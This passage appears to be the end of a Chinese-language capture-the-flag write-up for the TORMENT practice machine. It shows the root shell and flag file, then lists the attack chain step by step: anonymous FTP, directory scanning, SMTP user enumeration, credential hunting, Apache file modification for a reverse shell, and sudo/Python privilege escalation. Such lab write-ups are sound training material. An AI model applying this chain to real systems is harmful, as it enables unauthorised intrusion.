-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
---------- 1 root root 1329 Jan 4 2019 author-secret.txt
---------- 1 root root 128 Dec 31 2018 proof.txt
root@TORMENT:~# cat proof.txt
cat proof.txt
Congrutulations on rooting TORMENT. I hope this box has been as fun for you as it has been for me. :-)
Until then, try harder!
root@TORMENT:~#
成功提权并拿到flag
总结
本靶机首先通过ftp信息收集得到用户信息及id_rsa,然后通过CUPS收集用户表,再通过hexchat得到用户密码,ssh登录后更改apache文件,重启靶机后反弹shell,最后通过sudo提权。
- ftp匿名登录
- gobuster目录扫描
- curl创建用户表
- msf进行枚举smtp用户
- hexchat信息收集
- apache2文件修改
- sudo提权-Python提权
